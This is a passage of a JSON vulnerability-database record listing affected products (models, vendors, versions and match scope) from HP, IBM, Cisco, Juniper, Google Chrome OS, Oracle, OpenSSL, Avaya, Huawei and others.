        "vendor": "hp",
        "version": "43459.310.2"
      },
      {
        "model": "watson explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.3"
      },
      {
        "model": "jabber video for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos 12.1x44-d26",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.8"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.8.5"
      },
      {
        "model": "jboss enterprise application platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.2.2"
      },
      {
        "model": "junos 10.4r14",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.1"
      },
      {
        "model": "laserjet printer series q5403a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42508.250.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "webex connect client for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vcsa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "color laserjet printer series q5982a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "380046.80.8"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.4"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.4"
      },
      {
        "model": "junos pulse 4.0r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.12"
      },
      {
        "model": "cognos planning fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "junos -d10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x46"
      },
      {
        "model": "p2 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1810v10"
      },
      {
        "model": "fortiauthenticator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.28"
      },
      {
        "model": "junos space 13.1r1.6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "view client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.3.1"
      },
      {
        "model": "junos 10.0s25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 10.4r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "email and server security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "10.00"
      },
      {
        "model": "system dx360m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73251.42"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.13"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "softco v200r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.3"
      },
      {
        "model": "color laserjet cm6040 multifunction printer q3939a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52.256.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "junos 10.4r11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.6"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.1"
      },
      {
        "model": "vsphere storage appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1.3"
      },
      {
        "model": "laserjet p4015 cb511a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.0.1"
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1.2"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.17"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.18"
      },
      {
        "model": "junos 12.3r4-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "agile controller v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "nip2000\u00265000 v100r002c10hp0001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "tapi service provider",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "datafort s-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.4"
      },
      {
        "model": "core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9"
      },
      {
        "model": "junos r5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.2"
      },
      {
        "model": "russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66020"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "management center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.2.1.1"
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cf274a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "telepresence isdn gw mse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83210"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smc2.0 v100r002c01b017sp16",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.0"
      },
      {
        "model": "blackberry link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "1.2"
      },
      {
        "model": "msr20-1x family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "8.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aura conferencing standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "one-x mobile ces for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.4"
      },
      {
        "model": "system x3650m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "54541.42"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.7"
      },
      {
        "model": "physical access gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system m5 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x325054580"
      },
      {
        "model": "cognos insight standalone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "session border controller enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.4"
      },
      {
        "model": "junos 11.4r5-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "ive os 8.0r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89410"
      },
      {
        "model": "project openssl 0.9.8u",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "isoc v200r001c01spc101",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "5000"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "prime network registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "model": "junos os 12.1x44-d40",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "watson explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0"
      },
      {
        "model": "fortiweb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.1"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7600"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3.1"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "real-time compression appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.8.106"
      },
      {
        "model": "lifetime key management software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "security access manager for web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "vcenter converter standalone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb482a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50.286.1"
      },
      {
        "model": "10.0-beta",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "horizon workspace server gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.8.1"
      },
      {
        "model": "documentum content server p06",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "junos 12.1r8-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "prime network analysis module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.07"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.56"
      },
      {
        "model": "laserjet multifunction printer series q3945a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43459.310.2"
      },
      {
        "model": "websphere datapower xml accelerator xa35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0.15"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "executive scorecard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.5"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.21"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.4"
      },
      {
        "model": "isoc v200r001c00spc202",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "3000"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "60000"
      },
      {
        "model": "one-x client enablement services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "small business isa500 series integrated security appliances",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1.1"
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.21"
      },
      {
        "model": "netiq identity server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "color laserjet enterprise cp4525 cc495a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.164.1"
      },
      {
        "model": "junos 12.3r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.5.2"
      },
      {
        "model": "real-time compression appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9.107"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.28"
      },
      {
        "model": "storevirtual hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433511.5"
      },
      {
        "model": "systems insight manager 7.3.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "flex system p260 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-23x)0"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g84a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.3"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "vcsa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "color laserjet enterprise m750 d3l10a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "idp 4.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "horizon workspace client for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.8.1"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.20"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2"
      },
      {
        "model": "laserjet m3035 multifunction printer cc476a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "laserjet enterprise flow m830z mfp cf367a 2302963 436071",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "usg9500 usg9500 v300r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5750"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "config advisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "color laserjet cm4540 mfp cc420a 2302963 436067",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "color laserjet enterprise cp4525 cc494a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.164.1"
      },
      {
        "model": "laserjet enterprise mfp m725 cf067a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "color laserjet printer series q7492a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.9"
      },
      {
        "model": "eucalyptus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "eucalyptus",
        "version": "4.0"
      },
      {
        "model": "tandberg codian mse model",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83200"
      },
      {
        "model": "uma v200r001c00spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "color laserjet m680 cz249a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet m3035 multifunction printer cc477a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "isoc v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "3000"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.1.0"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "fortimanager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2"
      },
      {
        "model": "simatic wincc oa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "3.12"
      },
      {
        "model": "forticlient",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.22"
      },
      {
        "model": "eupp v100r001c10spc002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "10"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "websphere datapower low latency appliance xm70",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0.15"
      },
      {
        "model": "project openssl 0.9.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cognos insight standalone fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "oncommand balance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.0"
      },
      {
        "model": "project openssl j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "f1000a and s family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "stunnel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stunnel",
        "version": "5.02"
      },
      {
        "model": "u200a and m family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "sbr carrier",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.6"
      },
      {
        "model": "flex system fc5022",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "850/8700"
      },
      {
        "model": "officejet enterprise color c2s12a 2302963 436074",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x555"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "storevirtual china hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433511.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70000"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.4.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
